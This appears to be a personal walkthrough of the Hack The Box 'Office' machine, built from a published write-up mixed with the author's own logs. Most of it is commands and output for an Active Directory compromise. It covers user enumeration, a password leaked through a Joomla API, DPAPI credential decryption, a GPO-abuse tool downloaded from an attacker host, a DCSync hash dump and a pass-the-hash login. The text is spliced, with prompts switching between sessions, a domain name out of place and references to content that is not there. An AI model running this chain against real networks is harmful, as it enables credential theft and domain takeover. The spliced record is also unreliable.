htb-office
1st part see
HTB: Office | 0xdf hacks stuff
.
use kerbrute in userenum mode to check for valid users:
$ kerbrute userenum --dc 10.10.11.3 -d office.htb /opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txt
c:\PENTEST\HTB\OFFICE>curl http://office.htb/api/index.php/v1/config/application?public=true
{"links":{"--snip--id":"224","attributes":{"password":"H0lOgrams4reTakIng0Ver754!","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"if2tx_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
c:\PENTEST\HTB\OFFICE>
so we have a password: H0lOgrams4reTakIng0Ver754!
Shell as HHogan
Enumeration
cmdkey /list will show if there are any saved credentials on the current account:
PS C:\Users\PPotts> cmdkey /list
Currently stored credentials:
Target: LegacyGeneric:target=MyTarget
Type: Generic
User: MyUser
Target: Domain:interactive=office\hhogan
Type: Domain Password
User: office\hhogan
The one for HHogan is certainly of interest. They are in the Remote Management Users group, which means if I can recover this credential I can likely connect over WinRM:
Tip: It’s worth mentioning that the latest version of the tool SharpDPAPI is capable of extracting credentials protected by DPAPI.
Upload SharpDPAPI.exe , and Execute SharpDPAPI.exe
.
c:\windows\tasks\SharpDPAPI.exe credentials /rpc
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.12.0
[*] Action: User DPAPI Credential Triage
[*] Will ask a domain controller to decrypt masterkeys for us
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb
[*] Found MasterKey : C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\fb2eb8a9-12f7-4f07-83ee-d2cd6aae71c0
[*] Preferred master keys:
C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107:fb2eb8a9-12f7-4f07-83ee-d2cd6aae71c0
[*] User master key cache:
{10811601-0fa9-43c2-97e5-9bef8471fc7d}:FBAB11CACDD8407E8DB9604F0F8C92178BEE6FD3
{191d3f9d-7959-4b4d-a520-a444853c47eb}:85285EB368BEFB1670633B05CE58CA4D75C73C77
{fb2eb8a9-12f7-4f07-83ee-d2cd6aae71c0}:33DB2B821336CD6E93872AD397CB6960F1E9EEBA
[*] Triaging Credentials for current user
Folder : C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
CredFile : 18A1927A997A794B65E9849883AC3F3E
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
size : 358
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description : Enterprise Credential Data
LastWritten : 5/9/2023 2:08:54 PM
TargetName : LegacyGeneric:target=MyTarget
TargetAlias :
Comment :
UserName : MyUser
Credential :
CredFile : 84F1CAEEBF466550F4967858F9353FB4
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
size : 398
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description : Enterprise Credential Data
LastWritten : 5/9/2023 4:03:21 PM
TargetName : Domain:interactive=OFFICE\HHogan
TargetAlias :
Comment :
UserName : OFFICE\HHogan
Credential : H4ppyFtW183#
CredFile : E76CCA3670CD9BB98DF79E0A8D176F1E
guidMasterKey : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
size : 374
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description : Enterprise Credential Data
LastWritten : 1/18/2024 11:53:30 AM
TargetName : Domain:interactive=office\hhogan
TargetAlias :
Comment :
UserName : office\hhogan
Credential :
SharpDPAPI completed in 00:00:00.2319211
.WinRM
Validate
The creds are good for SMB and WinRM:
oxdf@hacky$ netexec smb office.htb -u hhogan -p 'H4ppyFtW183#'
SMB 10.10.11.3 445 DC Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [+] office.htb\hhogan:H4ppyFtW183#
oxdf@hacky$ netexec winrm office.htb -u hhogan -p 'H4ppyFtW183#'
WINRM 10.10.11.3 5985 DC Windows Server 2022 Build 20348 (name:DC) (domain:office.htb)
WINRM 10.10.11.3 5985 DC [+] office.htb\hhogan:H4ppyFtW183# (Pwn3d!)
Shell
I’ll use Evil-WinRM to get a shell:
C:\Python\Scripts>evil-winrm-py.exe -i office.htb -u hhogan -p H4ppyFtW183#
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to 'office.htb:5985' as 'hhogan'
evil-winrm-py PS C:\Users\HHogan\Documents>
C:\Python\Scripts>evil-winrm-py.exe -i office.htb -u hhogan -p H4ppyFtW183#
PS C:\PENTEST> $pass = ConvertTo-SecureString "H4ppyFtW183#" -AsPlainText -Force
PS C:\PENTEST> $cred = New-Object System.Management.Automation.PSCredential("SUPPORT\hhogan", $pass)
PS C:\PENTEST> Enter-PSSession -ComputerName office.htb -Credential $cred
[office.htb]: PS C:\Users\HHogan\Documents>
.
Administrator Access
Enumeration
I already noted above that HHogan is a member of the “GPO Managers” group:
*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami /groups
[office.htb]: PS C:\Users\HHogan\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OFFICE\GPO Managers Group S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
[office.htb]: PS C:\Users\HHogan\Documents>
There are a handful of GPOs here:
[office.htb]: PS C:\programdata> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
GPO Abuse
I’m going to assume that means that HHogan can edit GPOs. GPOs, or Group Policy Objects, are policies that Windows uses to manage computers at scale. It can control basically anything about a Windows computer.
There’s a really nice tool from FSecureLabs called SharpGPOAbuse designed to abuse GPOs. It offers the following:
I’ll host a copy on my Python webserver and upload it:
*Evil-WinRM* PS C:\programdata> wget 10.10.14.5/SharpGPOAbuse.exe -outfile SharpGPOAbuse.exe
The first GPO isn’t writable:
[office.htb]: PS C:\programdata> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Windows Firewall GPO"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Windows Firewall GPO" is: {04FE5C75-0078-4D44-97C5-8A796BE906EC}
Access to the path '\\office.htb\SysVol\office.htb\Policies\{04FE5C75-0078-4D44-97C5-8A796BE906EC}\Machine\Microsoft\Windows NT\SecEdit\' is denied.[!] Exiting...
But the second one I try works:
[office.htb]: PS C:\programdata> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
This doesn’t take effect until the GPO refreshes. HHogan has permissions to run gpupdate /force which will make that happen now:
*Evil-WinRM* PS C:\programdata> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Now HHogan is in the administrator’s group:
*Evil-WinRM* PS C:\programdata> net user hhogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.
It won’t show in my current session, but on exiting and reconnecting:
oxdf@hacky$ evil-winrm -i office.htb -u hhogan -p 'H4ppyFtW183#'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
[office.htb]: PS C:\Users\HHogan\Documents> net localgroup "Remote Management Users" /add ppotts
The command completed successfully.
And I can read root.txt:
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
f763e698************************
mimikatz # lsadump::dcsync /domain:OFFICE.HTB /user:OFFICE\Administrator
[DC] 'OFFICE.HTB' will be the domain
[DC] 'DC.office.htb' will be the DC server
[DC] 'OFFICE\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00110200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD NOT_DELEGATED )
Account expiration :
Password last change : 5/10/2023 12:00:50 PM
Object Security ID : S-1-5-21-1199398058-4196589450-691661856-500
Object Relative ID : 500
Credentials:
Hash NTLM: f5b4f1e96c7ffca801ed5832e5e9105d
ntlm- 0: f5b4f1e96c7ffca801ed5832e5e9105d
ntlm- 1: 70f38a92fcf07435790f06b81235478c
lm - 0: 54557a02c3b1e10476d1c894dfffcd1c
.
C:\Python\Scripts>evil-winrm-py.exe -i office.htb -u Administrator -H f5b4f1e96c7ffca801ed5832e5e9105d
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to 'office.htb:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents>
.